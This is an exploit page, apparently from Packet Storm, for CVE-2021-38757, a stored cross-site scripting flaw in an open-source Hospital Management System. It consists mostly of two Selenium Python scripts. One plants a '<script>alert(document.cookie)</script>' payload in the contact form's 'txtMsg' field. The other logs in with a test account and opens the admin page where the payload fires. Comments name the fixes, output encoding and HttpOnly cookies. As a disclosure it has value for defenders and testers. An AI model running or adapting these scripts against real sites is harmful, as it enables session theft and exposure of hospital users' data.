Hospital Management System Cross Site Scripting ≈ Packet Storm

# Exploit Title: Stored XSS in Hospital Management System exposing the user's PHPSESSID — vulnerable parameter "txtMsg" on the contact page
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757

[+] Exploit Source:

### P0C

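#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# Stored-XSS PoC for the Hospital-Management-System contact form. The value
# written into the "txtMsg" field below is stored by the application and
# later rendered without output encoding, so the <script> it carries runs in
# the browser of whoever views the stored message; the companion script
# (PoC-CVE-2021-38757-Check.py) logs in and opens the page where it is
# rendered. On the application side the fix is context-aware output encoding
# of stored input at render time, and marking PHPSESSID as HttpOnly so page
# scripts cannot read it through document.cookie.

import os
import subprocess
import sys
import time

from selenium import webdriver

# Contact page of the instance under test (lab address from the advisory).
website_link = "http://192.168.1.3/Hospital-Management-System-master/contact.html"

# Form fields and the values typed into them, in the order the original
# script filled them. The e-mail value on the published page was replaced by
# an anti-spam notice, so a labelled placeholder stands in for it; the txtMsg
# value is the advisory's payload, unchanged.
FORM_VALUES = {
    "txtName": "User",
    "txtEmail": "<EMAIL-PLACEHOLDER>",
    "txtPhone": "1234567890",
    "txtMsg": "nu11secur1ty<script>alert(document.cookie)</script>",
}

# Selector and value are passed to the page as execute_script arguments
# instead of being spliced into the JavaScript source, so a quote in a value
# cannot break the snippet.
SET_FIELD_JS = "document.querySelector(arguments[0]).value = arguments[1];"
CLICK_JS = "document.querySelector(arguments[0]).click();"

browser = webdriver.Chrome()
browser.get(website_link)

try:
    ## The Exploit
    for field, value in FORM_VALUES.items():
        browser.execute_script(SET_FIELD_JS, f'[name="{field}"]', value)

    ## submit the exploit
    browser.execute_script(CLICK_JS, '[name="btnSubmit"]')

    # Check: run the companion script with the interpreter running this one,
    # as an argument list rather than a shell command line. Its exit status
    # was ignored by the original os.system call and still is (check=False).
    subprocess.run([sys.executable, "PoC-CVE-2021-38757-Check.py"], check=False)

    print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
    #### This exception occurs if the element are not found in the webpage.
    print("Some error occured :(")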

### Ch3ck

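#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# Companion check for the stored-XSS PoC: logs into the portal with the
# account below and then opens admin-panel1.php, the page on which the
# stored "txtMsg" content is rendered, so the injected script can be
# observed firing. Mitigation is the same as for the PoC itself: encode
# stored input on output and set HttpOnly on the session cookie.

import time

from selenium import webdriver
from selenium.webdriver.common.by import By

# Login page of the instance under test (lab address from the advisory).
website_link = "http://192.168.1.3/Hospital-Management-System-master/index1.php"
# Page where the stored message is rendered.
check_link = "http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"

# Credentials of the account used to log in. The e-mail on the published
# page was replaced by an anti-spam notice, so a labelled placeholder stands
# in for it.
username = "<EMAIL-PLACEHOLDER>"
password = "password"

# name= attributes of the login form's inputs and submit button.
element_for_username = "email"
element_for_password = "password2"
element_for_submit = "patsub"

# Fixed wait after submitting the login before loading the check page,
# as in the original script.
LOGIN_WAIT_SECONDS = 3

browser = webdriver.Chrome()
browser.get(website_link)

try:
    # find_element(By.NAME, ...) works on Selenium 3 and 4; the
    # find_element_by_name helper used originally was removed in Selenium 4.3.
    browser.find_element(By.NAME, element_for_username).send_keys(username)
    browser.find_element(By.NAME, element_for_password).send_keys(password)
    browser.find_element(By.NAME, element_for_submit).click()

    # Check
    time.sleep(LOGIN_WAIT_SECONDS)
    browser.maximize_window()
    browser.get(check_link)

    print("The payload for CVE CVE-2021-38757 is deployed...\n")

except Exception:
    #### This exception occurs if the element are not found in the webpage.
    print("Some error occured :(")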

----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty
